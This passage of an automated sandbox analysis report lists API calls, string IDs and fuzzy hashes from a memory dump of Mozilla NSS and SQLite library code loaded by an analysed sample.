  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
• String ID: bUIl$bUIl
• API String ID: 326028414-2371435661
• Opcode ID: 5f020c839b3cd148a8f486f4a7314b6f3f6f527f1a39d38ae659126b4dae4c24
• Instruction ID: c9f606869b076449055570b3088209b3e66325b79e15129eac9c0d28ceb60624
• Opcode Fuzzy Hash: 5f020c839b3cd148a8f486f4a7314b6f3f6f527f1a39d38ae659126b4dae4c24
• Instruction Fuzzy Hash: E9412BB4A04A15DFCB00EF68C48496ABBF0FF49354B028669EC599B714EB30E855CBD5
APIs
• PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C4BDE64), ref: 6C4BED0C
• SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4BED22
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• PL_FreeArenaPool.NSS3(?), ref: 6C4BED4A
• PL_FinishArenaPool.NSS3(?), ref: 6C4BED6B
• PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4BED38
  • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
  • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
  • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
• SECOID_FindOID_Util.NSS3(?), ref: 6C4BED52
• PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4BED83
• PL_FreeArenaPool.NSS3(?), ref: 6C4BED95
• PL_FinishArenaPool.NSS3(?), ref: 6C4BED9D
  • Part of subcall function 6C4D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C4D127C,00000000,00000000,00000000), ref: 6C4D650E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Similarity
• API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
• String ID: security
• API String ID: 3323615905-3315324353
• Opcode ID: 702465069a302d6b785187ece1a1d88381492bf7c3609bc2c5d1d9b35f99302f
• Instruction ID: cc12123f169d1b21b0e0e741964f01e7a9e5db5589837a6bfbec65452a74df62
• Opcode Fuzzy Hash: 702465069a302d6b785187ece1a1d88381492bf7c3609bc2c5d1d9b35f99302f
• Instruction Fuzzy Hash: 85118B7590020667D700E625AC90FBB727CEF8120DF020868E801B2F40F7B4B50D86EB
APIs
• PR_LogPrint.NSS3(Aborting,?,6C462357), ref: 6C580EB8
• abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C462357), ref: 6C580EC0
• PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C580EE6
  • Part of subcall function 6C5809D0: PR_Now.NSS3 ref: 6C580A22
  • Part of subcall function 6C5809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C580A35
  • Part of subcall function 6C5809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C580A66
  • Part of subcall function 6C5809D0: PR_GetCurrentThread.NSS3 ref: 6C580A70
  • Part of subcall function 6C5809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C580A9D
  • Part of subcall function 6C5809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C580AC8
  • Part of subcall function 6C5809D0: PR_vsmprintf.NSS3(?,?), ref: 6C580AE8
  • Part of subcall function 6C5809D0: EnterCriticalSection.KERNEL32(?), ref: 6C580B19
  • Part of subcall function 6C5809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C580B48
  • Part of subcall function 6C5809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C580C76
  • Part of subcall function 6C5809D0: PR_LogFlush.NSS3 ref: 6C580C7E
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C580EFA
  • Part of subcall function 6C46AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C46AF0E
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F16
• fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F1C
• DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F25
• abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F2B
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
Similarity
• API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
• String ID: Aborting$Assertion failure: %s, at %s:%d
• API String ID: 3905088656-1374795319
• Opcode ID: 4648f7d73904939644803dd163787ecd8ef827bec4fb0555afde69342f883115
• Instruction ID: 0e80c764fd66bfc401cedd6e8ac79370ce27e7d9d3b2f617fb10b589658872d3
• Opcode Fuzzy Hash: 4648f7d73904939644803dd163787ecd8ef827bec4fb0555afde69342f883115
• Instruction Fuzzy Hash: C0F0AFB99001547BDA007BA1DC4ACAB3E2DEF82368F044028FD0956A02DB36FA5596F6
APIs
• PORT_NewArena_Util.NSS3(00000400), ref: 6C4E4DCB
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C4E4DE1
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C4E4DFF
• SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4E4E59
  • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
• SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C5A300C,00000000), ref: 6C4E4EB8
• SECOID_FindOID_Util.NSS3(?), ref: 6C4E4EFF
• memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C4E4F56
• PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4E521A
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1025791883-0
                                                                                                                                                                                                                          • Opcode ID: 59f1729dfe0e17cb81884145c6c4aec1845ee575a68e2ac7cdaa57ebf7118773
                                                                                                                                                                                                                          • Instruction ID: 7200ed4900cee7a8e74846b1faff37a26b5a6ccb87e9782ba7ef5fd523b6a65f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59f1729dfe0e17cb81884145c6c4aec1845ee575a68e2ac7cdaa57ebf7118773
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10F17D71E01205CBDB04CF98D840FADB7B2BF4835AF264169E915AB781E775E982CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C47502A
                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C475034
                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C4CFE80,6C4CFD30,6C51C350,00000000,00000000,00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C475055
                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C4CFE80,6C4CFD30,6C51C350,00000000,00000000,?,00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C47506D
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HashLockTable
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3862423791-0
                                                                                                                                                                                                                          • Opcode ID: 974718ba33bc2a20290f0915e30813f6a53181eed7de37258dc2fcaf703c0293
                                                                                                                                                                                                                          • Instruction ID: 73ab1c6ff0f2d7e4d38279a6e550a56e3a93f3f21e444921036baac238e563c4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 974718ba33bc2a20290f0915e30813f6a53181eed7de37258dc2fcaf703c0293
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A731A6B1B053609BEB20DAA58D4CF9737B8EB52349F028114E9158B740D375AD84CBFE
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C412F3D
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C412FB9
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C413005
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C4130EE
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C413131
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C413178
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 984749767-598938438
                                                                                                                                                                                                                          • Opcode ID: a3f07f5b6ecbbaa28719806c8c9184ede37f48051e130f5c7c3ae89d4990c854
                                                                                                                                                                                                                          • Instruction ID: c7d30e0cb2cf7eb595d905bebda3ed1aae99f0febba214f37d17eb6b744dc29f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3f07f5b6ecbbaa28719806c8c9184ede37f48051e130f5c7c3ae89d4990c854
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AB192B0E092199BCB18CF9DC884EFEBBB1BF49314F144429E485B7B45D774A942CBA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __allrem
                                                                                                                                                                                                                          • String ID: @Xl$PXl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$Xl
                                                                                                                                                                                                                          • API String ID: 2933888876-3624889994
                                                                                                                                                                                                                          • Opcode ID: a6552c5c93684acc6b4352eac8ec18c764147572bfc126864bb6c749cdd150ae
                                                                                                                                                                                                                          • Instruction ID: 97c06139c3bc32fb90f5802c877801aede76286e4dfe9e5860c780b6b7afe8c0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6552c5c93684acc6b4352eac8ec18c764147572bfc126864bb6c749cdd150ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5261A071A00705AFDB14CF65DC94FAA7BB1FB49314F10812CE915ABB80EB31AD06CB95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C4E7FB2
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BA51
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BA6B
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: EnterCriticalSection.KERNEL32 ref: 6C46BA83
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BAA1
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: _PR_MD_UNLOCK.NSS3 ref: 6C46BAC0
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C4E7FD4
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                            • Part of subcall function 6C4E9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C4E9466
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C4E801B
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C4E8034
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4E80A2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4E80C0
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C4E811C
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C4E8134
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
                                                                                                                                                                                                                          • String ID: )
                                                                                                                                                                                                                          • API String ID: 3537756449-2427484129
                                                                                                                                                                                                                          • Opcode ID: 7ca2fec3ce1fb7148dfd02bcd1a9cec299979b1f8e722e87bda68d68e89bb960
                                                                                                                                                                                                                          • Instruction ID: 57eb9e410817098d8eee4ef69d836629d150dc809857a5d65e39993648fdaa8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ca2fec3ce1fb7148dfd02bcd1a9cec299979b1f8e722e87bda68d68e89bb960
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C511971A047049BEB11DB389C01FEBB7B0AF5A31EF06052DD95956B42E731A909C792
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C48FCBD
                                                                                                                                                                                                                          • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C48FCCC
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C48FCEF
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C48FD32
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C48FD46
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C48FD51
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C48FD6D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C48FD84
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                          • API String ID: 183580322-336475711
                                                                                                                                                                                                                          • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                          • Instruction ID: 91b7e9e58499c9b08f27662ba53e48f224bfa92b53b57ed46471695e462ab7f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31B3B6A032159BFB01CAA49C05FAF77F8AF44319F150128DD15A7B00E7B1EA09C7D2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C470F62
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C470F84
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,6C48F59B,6C59890C,?), ref: 6C470FA8
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C470FC1
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C470FDB
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C470FEF
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C471001
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C471009
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 2061345354-3315324353
                                                                                                                                                                                                                          • Opcode ID: 4f955fa416b966a6b7c5eae195409bcfd94d74ee1fe2483714fe6a8b8c2d8756
                                                                                                                                                                                                                          • Instruction ID: cd2ef703a75af7cc390d416ada0769d91535c70556cc1c0beb19303859c8eecb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f955fa416b966a6b7c5eae195409bcfd94d74ee1fe2483714fe6a8b8c2d8756
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721E1B1904344AAE710EF24DC41EEA77B8EF44259F018919FC189A701F732A906CBE2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,6C477D8F,6C477D8F,?,?), ref: 6C476DC8
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C4CFE08
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C4CFE1D
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C4CFE62
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C477D8F,?,?), ref: 6C476DD5
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FA0,00000000,?,?,?,?,6C477D8F,?,?), ref: 6C476DF7
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C476E35
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C4CFE29
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C4CFE3D
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C4CFE6F
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C476E4C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FE0,00000000), ref: 6C476E82
                                                                                                                                                                                                                            • Part of subcall function 6C476AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C47B21D,00000000,00000000,6C47B219,?,6C476BFB,00000000,?,00000000,00000000,?,?,?,6C47B21D), ref: 6C476B01
                                                                                                                                                                                                                            • Part of subcall function 6C476AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C476B8A
                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C476F1E
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C476F35
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FE0,00000000), ref: 6C476F6B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,6C477D8F,?,?), ref: 6C476FE1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
• API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
• String ID:
• API String ID: 587344769-0
• Opcode ID: 4c48124bcf43919a323236c3f8ae43798647fcfef99f2ac91427e61daffe9687
• Instruction ID: 0fe247ac02f9263485040941d74ddfb011d7347939321039eb5be1848be25b8e
• Opcode Fuzzy Hash: 4c48124bcf43919a323236c3f8ae43798647fcfef99f2ac91427e61daffe9687
• Instruction Fuzzy Hash: FF716D71E106469BEB10CF65CD40FEABBB5BF95308F154229E808D7B11E770EA94CBA1
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4B1057
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4B1085
• PK11_GetAllTokens.NSS3 ref: 6C4B10B1
• free.MOZGLUE(?), ref: 6C4B1107
